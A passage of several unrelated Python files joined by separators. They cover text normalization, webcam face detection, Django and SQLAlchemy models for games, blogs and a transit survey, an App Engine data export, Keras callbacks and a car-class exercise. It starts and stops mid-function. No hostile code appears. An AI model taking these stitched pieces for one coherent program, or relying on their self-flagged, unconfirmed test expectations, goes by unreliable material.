    ignores = ["this", "data", "my", "was"]
    replaces = {"are": "is"}
    out = []
    for token in nlp(text):
        word = str(token)
        if token.pos == NOUN and word not in ignores:
            out.append(make_singular(word))
        else:
            # Non-nouns (and ignored nouns): apply the literal replacement
            # table, falling back to the token itself.
            out.append(replaces.get(word, word))
    return " ".join(out)
# Contraction -> expansion table. Built ONCE at import time; the original
# rebuilt both 93-entry lists on every word of every call.
_CONTRACTION_WORDS = ["ain't", "aren't", "can't", "could've", "couldn't",
                      "didn't", "doesn't", "don't", "gonna", "gotta",
                      "hadn't", "hasn't", "haven't", "he'd", "he'll", "he's",
                      "how'd", "how'll", "how's", "I'd", "I'll", "I'm",
                      "I've", "isn't", "it'd", "it'll", "it's", "mightn't",
                      "might've", "mustn't", "must've", "needn't",
                      "oughtn't",
                      "shan't", "she'd", "she'll", "she's", "shouldn't",
                      "should've", "somebody's", "someone'd", "someone'll",
                      "someone's", "that'll", "that's", "that'd", "there'd",
                      "there're", "there's", "they'd", "they'll", "they're",
                      "they've", "wasn't", "we'd", "we'll", "we're", "we've",
                      "weren't", "what'd", "what'll", "what're", "what's",
                      "whats",  # technically incorrect but some STT outputs
                      "what've", "when's", "when'd", "where'd", "where's",
                      "where've", "who'd", "who'd've", "who'll", "who're",
                      "who's", "who've", "why'd", "why're", "why's", "won't",
                      "won't've", "would've", "wouldn't", "wouldn't've",
                      "y'all", "ya'll", "you'd", "you'd've", "you'll",
                      "y'aint", "y'ain't", "you're", "you've"]
_EXPANSIONS = ["is not", "are not", "can not", "could have",
               "could not", "did not", "does not", "do not",
               "going to", "got to", "had not", "has not",
               "have not", "he would", "he will", "he is",
               "how did",
               "how will", "how is", "I would", "I will", "I am",
               "I have", "is not", "it would", "it will", "it is",
               "might not", "might have", "must not", "must have",
               "need not", "ought not", "shall not", "she would",
               "she will", "she is", "should not", "should have",
               "somebody is", "someone would", "someone will",
               "someone is", "that will", "that is", "that would",
               "there would", "there are", "there is", "they would",
               "they will", "they are", "they have", "was not",
               "we would", "we will", "we are", "we have",
               "were not", "what did", "what will", "what are",
               "what is",
               "what is", "what have", "when is", "when did",
               "where did", "where is", "where have", "who would",
               "who would have", "who will", "who are", "who is",
               "who have", "why did", "why are", "why is",
               "will not", "will not have", "would have",
               "would not", "would not have", "you all", "you all",
               "you would", "you would have", "you will",
               "you are not", "you are not", "you are", "you have"]
# BUG FIX: keys are lower-cased here. The original compared word.lower()
# against the capitalized list entries, so "I'm"/"I'd"/"I'll"/"I've" never
# matched and were left unexpanded.
_CONTRACTIONS = {c.lower(): e for c, e in zip(_CONTRACTION_WORDS, _EXPANSIONS)}
_ARTICLES = ("the", "a", "an")


def normalize(text, remove_articles=False, solve_corefs=False,
              make_singular=False, coref_nlp=None, nlp=None):
    """Normalize *text* for downstream NLP.

    Expands common contractions (lower-cased, e.g. "Isn't" -> "is not"),
    collapses repeated whitespace, and optionally removes articles,
    singularizes nouns and resolves coreferences.

    :param text: input string (coerced via str())
    :param remove_articles: drop "the"/"a"/"an" when True
    :param solve_corefs: run replace_coreferences() on the result
    :param make_singular: singularize each word via singularize()
        (NOTE: this parameter shadows the module-level make_singular import)
    :param coref_nlp: nlp pipeline handed to replace_coreferences
    :param nlp: spacy pipeline for singularization (lazily created if None)
    :return: the normalized string
    """
    text = str(text)
    normalized_words = []
    for word in text.split():  # split() also collapses extra whitespace
        if remove_articles and word in _ARTICLES:
            continue
        # Contractions are matched case-insensitively and expanded to the
        # lower-cased form.
        word = _CONTRACTIONS.get(word.lower(), word)
        if make_singular:
            # Singularization stays per-word to preserve the original
            # behavior (tagging a lone word can differ from a sentence).
            nlp = nlp or get_nlp()
            word = singularize(word, nlp=nlp)
        normalized_words.append(word)
    normalized = " ".join(normalized_words)
    if solve_corefs:
        normalized = replace_coreferences(normalized, coref_nlp)
    return normalized.strip()
if __name__ == "__main__":
    sentence = "What's the weather like?"
    print(normalize(sentence))
    # NOTE, contractions are lower cased when expanded.
    # BUG FIX: remove_articles defaults to False, so "the" is preserved —
    # the original assertion expected "what is weather like?" and failed.
    assert normalize(sentence) == "what is the weather like?"
    sentence = "My sister loves dogs."
    # NOTE(review): expected output assumes spacy tags "loves" in a way that
    # singularizes it — confirm against the installed spacy model.
    assert normalize(sentence, make_singular=True) == "My sister love dog."
    sentence = "My sister has a dog. She loves him."
    assert normalize(sentence, solve_corefs=True) == "My sister has a dog. " \
                                                    "My sister loves a dog."
import cv2
import os
from PIL import Image
import imutils
from io import BytesIO
import base64
# Path to the OpenCV pre-trained frontal-face Haar cascade.
haar_file = 'haarcascade_frontalface_default.xml'
# img sample size
(width, height) = (130, 100)
# CONSISTENCY FIX: reuse the haar_file constant instead of repeating the
# literal filename (the two could silently drift apart).
face_algo = cv2.CascadeClassifier(haar_file)
def detect():
    """Stream video from an IP webcam, draw boxes around detected faces,
    and display the annotated frames until 'q' is pressed.

    :return: True once the preview loop has been closed cleanly
    """
    video = cv2.VideoCapture(0)
    # Opening the IP-webcam stream replaces the local camera opened above.
    address = "http://192.168.43.1:8080/video"
    video.open(address)
    while True:
        (_, im) = video.read()
        gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
        faces = face_algo.detectMultiScale(gray, 1.3, 2)
        for x, y, w, h in faces:
            # BUG FIX: the original drew on and displayed an undefined name
            # `frame`, raising NameError on the first detected face.
            cv2.rectangle(im, (x, y), (x + w, y + h), (255, 0, 0), 2)
            face = gray[y:y + h, x:x + w]
            # TODO: face_resize is computed but never used — persist or drop.
            face_resize = cv2.resize(face, (width, height))
        cv2.imshow("test", im)
        key = cv2.waitKey(1)
        if key == ord('q'):
            break
    video.release()
    # BUG FIX: destroyAllWindows was referenced but never called.
    cv2.destroyAllWindows()
    return True
|
import json
import datetime
from django import template
from django.db.models import Avg
from general.models import *
# Template-filter registry; the @register.filter decorators below attach to
# this instance, which Django discovers when the templatetag module loads.
register = template.Library()
@register.filter
def is_accepted(player, game):
    """Template filter: True if *player*'s invitation to *game* is accepted.

    A missing invitation counts as not accepted.
    """
    # FIX: .first() avoids indexing a possibly-empty queryset; the original
    # masked the resulting IndexError with a broad `except Exception`.
    invitation = GameInvitation.objects.filter(player=player, game=game).first()
    return invitation.is_accepted if invitation is not None else False
@register.filter
def player_count(game):
    """Template filter: number of accepted invitations for *game*."""
    accepted = GameInvitation.objects.filter(game=game, is_accepted=True)
    return accepted.count()
@register.filter
def game_count(location):
    """Template filter: count of *location*'s events from now onwards."""
    now = datetime.datetime.now()  # naive local time, as elsewhere in this module
    return location.events.filter(datetime__gte=now).count()
@register.filter
def ids(qs):
    """Template filter: comma-separated ids of the objects in *qs*."""
    return ','.join(str(obj.id) for obj in qs)
|
from datetime import datetime
from app.core.domain.comment import Comment
from app.core.domain.post import Post
from .database import db
class PostModel(db.Model):
    """SQLAlchemy row for a blog post; converts to the Post domain entity."""
    __tablename__ = "posts"
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    title = db.Column(db.Unicode(255))
    body = db.Column(db.UnicodeText())
    # Timestamps are naive UTC; updated_at refreshes automatically on UPDATE.
    created_at = db.Column(db.DateTime, default=datetime.utcnow)
    updated_at = db.Column(
        db.DateTime, default=datetime.utcnow, onupdate=datetime.utcnow
    )
    def to_entity(self):
        """Build a domain Post from this row, embedding its comments as dicts.

        ``self.comments`` is the backref declared on CommentModel.post.
        """
        return Post.from_dict(
            {
                "id": self.id,
                "title": self.title,
                "body": self.body,
                "comments": [c.to_dict() for c in self.comments],
            }
        )
class CommentModel(db.Model):
    """SQLAlchemy row for a comment attached to a post."""
    __tablename__ = "comments"
    id = db.Column(db.Integer, primary_key=True)
    body = db.Column(db.UnicodeText)
    post_id = db.Column(db.Integer, db.ForeignKey(PostModel.id))
    # backref="comments" exposes the reverse collection on PostModel.
    post = db.relationship(PostModel, backref="comments")
    # Timestamps are naive UTC; updated_at refreshes automatically on UPDATE.
    created_at = db.Column(db.DateTime, default=datetime.utcnow)
    updated_at = db.Column(
        db.DateTime, default=datetime.utcnow, onupdate=datetime.utcnow
    )
    def to_dict(self):
        """Plain-dict view used when embedding comments inside a Post."""
        return {"id": self.id, "post_id": self.post_id, "body": self.body}
    def to_entity(self):
        """Build the Comment domain entity from this row."""
        return Comment.from_dict(
            {"id": self.id, "post_id": self.post_id, "body": self.body}
        )
|
# -*- coding: utf-8 -*-
import uuid
from django.contrib.auth.models import User
from django.db import models
from datetime import date, time, datetime
from django.utils.encoding import python_2_unicode_compatible
from django.db.models.query import QuerySet
""" constantes """
#momento de la encuesta
ANTES_ASCENDER = 'AA'
LUEGO_DESCENDER = 'LD'
PARADA = 'P' #tipos de Lugares.parada
class ActivosQuerySet(QuerySet):
    """QuerySet whose bulk delete() performs a logical (soft) delete."""
    def delete(self):
        # Flag rows inactive instead of issuing a SQL DELETE.
        self.update(activo=False)
class AdministrarActivos(models.Manager):
    """Manager pairing the soft-delete queryset with an active-rows shortcut."""
    def activo(self):
        # Only the rows still flagged as active.
        return self.model.objects.filter(activo=True)
    def get_queryset(self):
        # Hand out the soft-deleting queryset so bulk deletes stay logical.
        return ActivosQuerySet(self.model, using=self._db)
@python_2_unicode_compatible
class Numerador (models.Model):
    # Named counter used by sigNumero() to hand out sequential reference
    # numbers. NOTE(review): blank='true' passes a truthy *string*, not the
    # boolean True — it behaves the same but should be blank=True.
    nombre = models.CharField(max_length=30, blank='true',unique=True)
    ultimo_valor = models.IntegerField(default=0)
    def __str__(self):
        return self.nombre
#from nqnmovilutiles import sigNumero,completarConCeros  # Uses Numerador, so it would be imported after the model exists
""" sigNumero and completarConCeros should be moved to an nqnmovilutiles module """
def sigNumero(nombreNumerador):
    """Return the next sequential value for the named counter.

    Creates the counter at 1 on first use; otherwise increments, persists
    and returns the new value.

    NOTE(review): read-increment-save is not atomic — concurrent requests
    can hand out duplicate numbers; consider an F() expression inside a
    transaction.
    """
    try:
        n = Numerador.objects.get(nombre=nombreNumerador)
    except Numerador.DoesNotExist:
        # First use: create the counter in the DB starting at 1.
        n = Numerador(nombre=nombreNumerador, ultimo_valor = 1)
        n.save()
        return n.ultimo_valor
    else:
        # Counter exists: bump, persist and return the new value.
        n.ultimo_valor += 1
        n.save()
        return n.ultimo_valor
def completarConCeros( numero, longitud):
    """Return *numero* as a string left-padded with zeros to *longitud* digits.

    Values already longer than *longitud* are returned unpadded (zfill never
    truncates).
    """
    return str(numero).zfill(longitud)
@python_2_unicode_compatible
class Campania (models.Model):
    # A survey campaign: a labelled date range during which surveys are taken.
    descripcion = models.CharField('Descripción',max_length=100)
    fecha_inicio = models.DateField('Fecha de inicio', default=date.today)
    fecha_fin = models.DateField('Fecha de fin')
    def __str__(self):
        return self.descripcion
    class Meta:
        verbose_name = "Campaña"
        verbose_name_plural = "Campañas"
#@python_2_unicode_compatible
class Encuestador (models.Model):
    # A surveyor: wraps a Django user plus a soft-delete flag.
    # NOTE(review): ForeignKey without on_delete relies on pre-2.0 Django.
    usuario = models.ForeignKey(User)
    activo = models.BooleanField('Encuestador activo',default=True)
    def __str__(self):
        return self.usuario.get_full_name()#self.usuario.first_name
    class Meta:
        verbose_name = "Encuestador"
        verbose_name_plural = "Encuestadores"
    def delete(self):
        # Logical delete: flag inactive rather than removing the row.
        self.activo = False
        self.save()
@python_2_unicode_compatible
class Parada (models.Model):
    # A transit stop, identified only by its number.
    numero = models.CharField('Número',max_length=10)
    def __str__(self):
        return self.numero
    class Meta:
        verbose_name = "Parada"
        verbose_name_plural = "Paradas"
@python_2_unicode_compatible
class Linea (models.Model):
    # A transit line, identified by its short name.
    nombre = models.CharField('nombre de la línea',max_length=10)
    def __str__(self):
        return self.nombre
@python_2_unicode_compatible
class Lugar (models.Model):
    # A named place usable as trip origin/destination, typed by category.
    # place-type codes
    ZONA= 'Z'
    HITO = 'H'
    PARADA = 'P'
    CALLE = 'C'
    BARRIO = 'B'
    TIPO_LUGAR = (
        (ZONA, 'Zona'),
        (HITO, 'Hito'),
        (PARADA, 'Parada'),
        (CALLE, 'Calle'),
        (BARRIO, 'Barrio')
    )
    tipo = models.CharField('Tipo de lugar',max_length=1, choices=TIPO_LUGAR, blank='true')
    nombre = models.CharField('Nombre del lugar',max_length=100)
    def __str__(self):
        return self.nombre
    class Meta:
        verbose_name = "Lugar"
        verbose_name_plural = "Lugares"
@python_2_unicode_compatible
class Motivo (models.Model):
    # A trip purpose (work, study, ...), referenced from Encuesta.
    nombre = models.CharField('nombre del motivo',max_length=100)
    def __str__(self):
        return self.nombre
@python_2_unicode_compatible
class Encuesta (models.Model):
    """On-street transit survey response.

    Groups procedure metadata, the respondent profile, trip
    origin/destination, trip details and service-quality ratings.
    Deletes are logical (``activo`` flag) via AdministrarActivos.
    """
    # survey moment
    ANTES_ASCENDER = 'AA'
    LUEGO_DESCENDER = 'LD'
    MOMENTO = (
        (ANTES_ASCENDER, 'antes de ascender'),
        (LUEGO_DESCENDER, 'luego de descender'),
    )
    # sex
    FEMENINO = 'F'
    MASCULINO = 'M'
    SEXO = (
        (FEMENINO, 'Femenino'),
        (MASCULINO, 'Masculino'),
    )
    # age range
    JOVEN = 'JO'
    ADULTO = 'A1'
    ADULTO_MAYOR = 'AM'
    RANGO_EDAD = (
        (JOVEN,'Jóven (18-25 años)'),
        (ADULTO,'Adulto (25-60 años)'),
        (ADULTO_MAYOR,'Adulto mayor (más de 60 años)'),
    )
    # place type
    ZONA= 'Z'
    HITO = 'H'
    PARADA = 'P'
    TIPO_LUGAR = (
        (ZONA, 'Zona'),
        (HITO, 'Hito'),
        (PARADA, 'Parada'),
    )
    # survey-procedure data
    # do not use this: id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    referencia = models.CharField('Número de encuesta',max_length=10,blank='true') # auto-incremented in save()
    # NOTE(review): the second positional argument looks wrong — ForeignKey
    # expects on_delete (or to_field) there, not the model class itself.
    encuestador = models.ForeignKey('Encuestador',Encuestador, null='true')
    parada_encuesta = models.ForeignKey(Parada,verbose_name='Parada', null='true', on_delete= models.PROTECT)
    cargaonline = models.BooleanField('Encuesta cargada en línea',default=True)
    dia_realizada = models.DateField('fecha de realización', default=date.today)
    hora_realizada = models.TimeField('hora de realización', default= time(16, 00))
    hora_inicio = models.DateTimeField(blank = 'true', null = 'true')
    hora_fin = models.DateTimeField(blank = 'true', null = 'true')
    momento = models.CharField('Momento de la encuesta',max_length=2, choices=MOMENTO, default= ANTES_ASCENDER)
    # respondent profile
    sexo = models.CharField('1.a. Sexo',max_length=1, choices=SEXO)
    rango_edad = models.CharField('1.b. Rango de edad',max_length=2, choices=RANGO_EDAD)
    # trip origin
    # TODO: hide place and stop for both origin and destination, or allow blank entry
    origen_lugar = models.ForeignKey(Lugar, related_name='encuesta_origen_lugar', null='true', blank='true', on_delete= models.PROTECT)
    origen_motivo = models.ForeignKey(Motivo,verbose_name='2.a. Motivo del viaje. Desde',related_name='encuesta_origen_motivo', null='true', on_delete= models.PROTECT)
    origen_parada = models.CharField('Parada de origen (opcional)',max_length=10, blank='true') # only filled when the place type is a stop
    # trip destination
    destino_lugar = models.ForeignKey(Lugar,related_name='encuesta_destino_lugar', null='true', blank='true', on_delete= models.PROTECT)
    destino_motivo = models.ForeignKey(Motivo,verbose_name='2.b. Motivo del viaje. Hacia',related_name='encuesta_destino_motivo', null='true', on_delete= models.PROTECT)
    destino_parada = models.CharField('Parada de destino (opcional)',max_length=10, blank='true') # only filled when the place type is a stop
    # trip details
    # trips per week
    TODOS_LOS_DIAS = 'TODOS'
    TRES_O_MAS = '3OMAS'
    MENOS_DE_TRES = 'MENOS3'
    VECES_SEMANA = (
        (TODOS_LOS_DIAS, 'Todos los días'),
        (TRES_O_MAS, 'Tres o más'),
        (MENOS_DE_TRES, 'Menos de tres'),
    )
    veces_semana = models.CharField('3.a. Veces por semana en que realiza este viaje',max_length=6, choices=VECES_SEMANA)
    # trips per day
    DOS_O_MAS = '2OMAS'
    MENOS_DE_DOS = 'MENOS2'
    VECES_DIA = (
        (DOS_O_MAS, 'Dos o más'),
        (MENOS_DE_DOS, 'Menos de dos'),
    )
    veces_dia = models.CharField('3.b. Veces por día en que realiza este viaje',max_length=6, choices=VECES_DIA)
    # other transport modes used to complete the trip
    NO_OTRO_MEDIO = 'NO'
    OTRA_LINEA = 'OLINEA'
    AUTO = 'AUTO'
    TAXI_REMIS = 'TAXREM'
    OTRO = 'OTRO'
    OTRO_MEDIO = (
        (NO_OTRO_MEDIO,'No'),
        (OTRA_LINEA,'Otra línea'),
        (AUTO,'Automóvil'),
        (TAXI_REMIS,'Taxi o Remis'),
        (OTRO,'Otro medio'),
    )
    otro_medio = models.CharField('4. Para completar el viaje ¿Usa otro medio de transporte?',max_length=6, choices=OTRO_MEDIO)
    linea = models.ForeignKey(Linea,verbose_name='5. ¿En qué línea de transporte suele viajar?', null='true', on_delete= models.PROTECT)
    # service-quality rating scale
    MUY_BUENO = 'MB'
    BUENO = 'BU'
    REGULAR = 'RE'
    MALO = 'MA'
    NS_NC = 'NS'
    CALIFICA_CALIDAD = (
        (MUY_BUENO, 'muy bueno'),
        (BUENO, 'bueno'),
        (REGULAR, 'regular'),
        (MALO, 'malo'),
        (NS_NC, 'Ns/Nc'),
    )
    estado_unidad = models.CharField('6.a. Estado general de las unidades',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
    comodidad = models.CharField('6.b. Comodidad con la que viaja',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
    higiene_unidad = models.CharField('6.c. Higiene de las unidadades',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
    trato_choferes = models.CharField('7.a. Nivel de trato y atención recibida por los choferes',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
    conduccion_choferes = models.CharField('7.b. Desempeño de los choferes en la conducción',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
    info_choferes = models.CharField('7.c. Nivel de información del sistema de transporte de los choferes?',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
    # interest in ancillary services
    SI = 'SI'
    NO = 'NO'
    NO_ME_INTERESA = 'NI'
    NO_LO_CONOZCO = 'NC'
    INTERES_SERVICIOS_ANEXOS = (
        (SI,'Si'),
        (NO,'No'),
        (NO_LO_CONOZCO,'No. No lo conozco'),
    )
    # transport information channels
    WEB_CUANDOPASA = 'WC'
    WEB_MUNICIPAL = 'WM'
    CONSULTAS_TELEFONICAS = 'CT'
    MENSAJE_TEXTO = 'MT'
    CARTELES_INTELIGENTES ='CI'
    APP_CEL_CUANDO_PASA = 'CP'
    USA_MEDIOS_INFORMACION = (
        (SI,'Si'),
        (NO,'No'),
        (NO_ME_INTERESA,'No. No estoy interesado/a'),
        (NO_LO_CONOZCO,'No. No lo conozco'),
        (WEB_CUANDOPASA,'Si. Página web de cuandopasa.com'),
        (WEB_MUNICIPAL,'Si. Página web de la Municipalidad'),
        (CONSULTAS_TELEFONICAS,'Si. Consultas telefónicas'),
        (MENSAJE_TEXTO,'Si. Mensaje de texto'),
        (CARTELES_INTELIGENTES,'Si. Carteles de información LED'),
    )
    usa_medio_informacion = models.CharField('8. ¿Utiliza algún medio de información de transporte?',max_length=2, choices=USA_MEDIOS_INFORMACION, default = NO_LO_CONOZCO)
    usa_trasbordo = models.CharField('9. ¿Utiliza el servicio de trasbordo?',max_length=2, choices=INTERES_SERVICIOS_ANEXOS, default = NO)
    # TODO: SUBE card
    # SUBE card benefits
    BENEF_SUBE_NO = 'BS_NO'
    BENEF_SUBE_SI_ANSES = 'BS_AN'
    BENEF_SUBE_SI_ESCOLAR = 'BS_ES'
    BENEF_SUBE_SI_UNIVERSITARIO = 'BS_UN'
    BENEF_SUBE_SI_JUCAID = 'BS_JU'
    # NOTE(review): this is a *set* literal, so the order of choices shown in
    # forms is not deterministic — it should be a tuple/list of pairs.
    SUBE_BENEFICIOS = {
        (BENEF_SUBE_NO,'No'),
        (SI,'Si'),
        (BENEF_SUBE_SI_ANSES,'Si. ANSES'),
        (BENEF_SUBE_SI_ESCOLAR,'Si. Escolar'),
        (BENEF_SUBE_SI_UNIVERSITARIO,'Si. Universitario'),
        (BENEF_SUBE_SI_JUCAID,'Si. JUCAID'),
    }
    sube_beneficios = models.CharField('9.1 ¿Su tarjeta SUBE tiene algún beneficio?',max_length=5, choices=SUBE_BENEFICIOS, default = BENEF_SUBE_NO)
    # perceived service improvement
    MEJORO_BASTANTE = 'MB'
    MEJORO_MEDIANAMENTE = 'MM'
    MEJORO_POCO = 'MP'
    NO_MEJORO = 'NM'
    MEJORA_SERVICIO = (
        (MEJORO_BASTANTE,'Mejoró bastante'),
        (MEJORO_MEDIANAMENTE,'Mejoró medianamente'),
        (MEJORO_POCO,'Mejoró poco'),
        (NO_MEJORO,'No mejoró'),
        (NS_NC, 'Ns/Nc'),
    )
    opinion_servicio = models.CharField('9.2. ¿En este último tiempo, considera que el servicio brindado por la Empresa?',max_length=2, choices=MEJORA_SERVICIO, default = NS_NC)
    opinion_trabajo_muni = models.CharField('9.3. ¿Cómo calificaría el trabajo que está realizando la Municipalidad para el control y mejoramiento del servicio?',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
    sugerencia = models.CharField('10. ¿Tiene alguna sugerencia o comentario?',max_length=140, blank='true')
    activo = models.BooleanField('Encuesta activa',default=True)
    ESTADO_COMPLETA = 'COM'
    ESTADO_INCOMPLETA = 'INC'
    ESTADOS = (
        (ESTADO_COMPLETA, 'Si. Encuesta completa'),
        (ESTADO_INCOMPLETA, 'No. Terminaré de cargarla más adelante'),
    )
    estado = models.CharField('¿Da por finalizada la carga de la encuesta?',max_length=3, choices=ESTADOS, default = ESTADO_INCOMPLETA)
    def __str__(self):
        return self.referencia
    # Only logical deletes are allowed; the manager also lists active surveys.
    objects = AdministrarActivos()
    def delete(self):
        # Logical delete: flag the survey inactive instead of removing it.
        self.activo = False
        self.save()
    def save(self, *args, **kwargs):
        # On insert (no id yet), assign the next auto-incremented reference.
        if self.id is None:
            self.referencia = completarConCeros( sigNumero('encuesta_campania_0001'), 5)
            unaparada = Lugar.objects.get(tipo = PARADA) # there must be exactly one Lugar of type PARADA (get() raises otherwise)
            # Default origin/destination stop values, disabled in favour of manual entry:
            #self.origen_parada = self.parada_encuesta.numero if self.momento == ANTES_ASCENDER else '' # if surveyed when boarding, use the survey stop as origin
            #self.origen_lugar = unaparada if self.momento == ANTES_ASCENDER else None
            #self.destino_parada = self.parada_encuesta.numero if self.momento == LUEGO_DESCENDER else '' # if surveyed when alighting, use the survey stop as destination
            #self.destino_lugar = unaparada if self.momento == LUEGO_DESCENDER else None
        super(Encuesta, self).save(*args, **kwargs) # Call the "real" save() method.
    def origenfijo(self): # origin place and stop cannot be modified
        return True if self.momento == ANTES_ASCENDER else False
|
"""Export survey data to Cloud Storage.
This implements a new admin-only page that allows exporting survey data from
the App Engine Datastore into a file in Cloud Storage, for easy downloading.
Alternately, this can export the data from Datastore into a Spreadsheet in the
admin's Google Drive.
"""
import datetime
import gc
import json
import site
import time
site.addsitedir('lib')
import cloudstorage as gcs
from models import SurveyModel
import webapp2
from google.appengine.api import taskqueue
package = 'ChromeExperienceSampling'
# Minimal admin page: a single button that POSTs to /export to queue a job.
EXPORT_PAGE_HTML = """\
<html>
<body>
<form action='/export' method='post'>
<div><input type='submit' value='Start Export'></div>
</form>
</body>
</html>
"""
class ModelEncoder(json.JSONEncoder):
    """JSON encoder that serializes datetimes as ISO-8601 strings.

    Datastore entities carry datetime properties that plain json.dumps
    cannot encode, so they are handled explicitly here.
    """
    def default(self, obj):
        if not isinstance(obj, datetime.datetime):
            # Defer to the base class, which raises TypeError for unknowns.
            return json.JSONEncoder.default(self, obj)
        return obj.isoformat()
class ExportPage(webapp2.RequestHandler):
    """Admin page that queues a Datastore-export task on submit."""
    def get(self):
        # Render the one-button export form.
        self.response.write(EXPORT_PAGE_HTML)
    def post(self):
        # Queue the export job on the task queue, then bounce back to the form.
        params = {'filename': self.request.get('filename')}
        taskqueue.add(url='/export/worker', params=params)
        self.redirect('/export')
class ExportWorker(webapp2.RequestHandler):
    """Taskqueue worker that streams SurveyModel rows into Cloud Storage.

    An explicit filename may be supplied in the task params; otherwise a
    timestamped default name is generated. Rows are fetched a page at a
    time and written one by one so memory usage stays low, and the output
    is a single JSON array.
    """
    def post(self):
        bucket_name = 'survey_responses'
        filename = self.request.get('filename')
        if not filename:
            # Default: surveys.<timestamp>.json
            stamp = time.strftime('%Y_%m_%d_%H%M%S_%Z')
            filename = '.'.join(['surveys', stamp, 'json'])
        path = '/' + bucket_name + '/' + filename
        with gcs.open(path, 'w') as out:
            out.write('[')
            query = SurveyModel.query()
            cursor = None
            more = True
            separator = ''
            while more:
                page, cursor, more = query.fetch_page(50, start_cursor=cursor)
                gc.collect()  # keep the worker's footprint small between pages
                for record in page:
                    out.write(separator)
                    out.write(json.dumps(record.to_dict(), cls=ModelEncoder))
                    separator = ',\n'
            out.write(']')
# Route table: the form page (with and without trailing slash) plus the worker.
APPLICATION = webapp2.WSGIApplication([
    ('/export/', ExportPage),
    ('/export', ExportPage),
    ('/export/worker', ExportWorker)
])
|
# -*- coding: utf-8 -*-
import sys
import os
import logging
import pickle
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
import numpy as np
import tensorflow.contrib.keras as ker
from tensorflow.contrib.keras.python.keras import backend as K
from sklearn.metrics import precision_recall_fscore_support
from conf import config
# Set up python logging format
log_format = '%(asctime)s %(levelname)s %(message)s'
logging.basicConfig(format=log_format, level=logging.INFO)
# Declare parameters
DIR_DETAILED_RESULTS = config.DIR_DETAILED_RESULTS
def set_last_layers_trainable(model, train_layer):
    """Freeze the layers before *train_layer* and unfreeze the rest.

    :param model: model exposing a ``layers`` sequence
    :param train_layer: index of the first layer to train; 0 freezes every
        layer (nothing is trained)
    :return: the same model, with ``trainable`` flags updated in place
    """
    if train_layer == 0:
        # Special case: 0 means "freeze the whole network".
        for layer in model.layers:
            layer.trainable = False
        return model
    frozen, trained = model.layers[:train_layer], model.layers[train_layer:]
    for layer in frozen:
        layer.trainable = False
    for layer in trained:
        layer.trainable = True
    return model
class DecayLR(ker.callbacks.Callback):
    """Callback that multiplies the learning rate by *decay* every 3rd epoch."""
    def __init__(self, decay):
        """Constructor

        :param decay: factor in [0, 1] applied to the learning rate
        """
        super(DecayLR, self).__init__()
        self.decay = decay
    def on_epoch_begin(self, epoch, logs=None):
        """Scale the optimizer's learning rate at the start of epochs 3, 6, ...

        :param epoch: 0-based epoch number
        :param logs: unused; kept for the Keras callback signature
            (FIX: was the mutable default ``logs={}``)
        """
        old_lr = K.get_value(self.model.optimizer.lr)
        if epoch % 3 == 0 and epoch > 0:
            new_lr = self.decay * old_lr
            K.set_value(self.model.optimizer.lr, new_lr)
            logging.info("New value for the learning rate : {}".format(K.get_value(self.model.optimizer.lr)))
        # FIX: the original else-branch rewrote the unchanged value back into
        # the optimizer — a no-op that has been removed.
class MetricsDetailedScore(ker.callbacks.Callback):
    """Callback that pickles precision/recall/F1/support after training."""
    def __init__(self, test_name):
        """Constructor

        :param test_name: run name used to name the output pickle file
        """
        super(MetricsDetailedScore, self).__init__()
        self.test_name = test_name
    def on_train_end(self, logs=None):
        """Compute detailed metrics on the validation data and pickle them.

        :param logs: unused; kept for the Keras callback signature
            (FIX: was the mutable default ``logs={}``)
        """
        predict = self.model.predict(self.validation_data[0])
        # Index of the best class per sample, shaped (n, 1).
        best_idx = np.argmax(predict, axis=1).reshape(len(predict), 1)
        # NOTE(review): [1 - idx, idx] one-hot encoding is only meaningful for
        # binary classification — confirm the model has exactly two classes.
        predict_dumm = np.concatenate([1 - best_idx, best_idx], axis=1)
        # Compute and save the metrics using the ground truth and predictions.
        all_indicators = precision_recall_fscore_support(self.validation_data[1], predict_dumm)
        with open(DIR_DETAILED_RESULTS + self.test_name + '.pkl', 'wb') as f:
            pickle.dump(all_indicators, f)
|
class Car:
    """Base vehicle holding a make and mileage behind accessor methods."""
    def __init__(self, p_make, p_mileage):
        # Name-mangled attributes keep subclasses from touching them directly.
        self.__make = p_make
        self.__mileage = p_mileage
    def get_make(self):
        """Return the car's make."""
        return self.__make
    def get_mileage(self):
        """Return the car's mileage."""
        return self.__mileage
    def __str__(self):
        # Delegates to object.__str__ — same text as not overriding at all.
        return super().__str__()
class Toyota(Car):
    """Toyota-branded car adding model, price and company fields."""
    def __init__(self, p_make, p_mileage, p_model, p_price):
        Car.__init__(self, p_make, p_mileage)
        self.__model = p_model
        self.__price = p_price
        self.__company = 'Toyota'
    def get_car_info(self):
        """Print the car's details, one labelled line per field."""
        for label, value in (("Company : ", self.__company),
                             ("Model : ", self.__model),
                             ("Make : ", super().get_make()),
                             ("Mileage : ", super().get_mileage()),
                             ("Price : ", self.__price)):
            print(label, value)
class Maruti(Car):
    """Maruti-branded car adding model, price and company fields."""
    def __init__(self, p_make, p_mileage, p_model, p_price):
        Car.__init__(self, p_make, p_mileage)
        self.__model = p_model
        self.__price = p_price
        self.__company = 'Maruti'
    def get_car_info(self):
        """Print the car's details, one labelled line per field."""
        for label, value in (("Company : ", self.__company),
                             ("Model : ", self.__model),
                             ("Make : ", super().get_make()),
                             ("Mileage : ", super().get_mileage()),
                             ("Price : ", self.__price)):
            print(label, value)
def _read_car_details():
    """Prompt for one car's specs; returns (make, mileage, model, price)."""
    p_mileage = int(input("Enter the mileage :\n"))
    p_make = int(input("Enter the make :\n"))
    p_model = input("Enter the model :\n")
    p_price = int(input("Enter the price :\n"))
    return p_make, p_mileage, p_model, p_price
def main():
    """Read specs for a used Toyota and a used Maruti, then print both.

    The two identical prompt sequences of the original were factored into
    _read_car_details(); prompt order and text are unchanged.
    """
    used_toyota = Toyota(*_read_car_details())
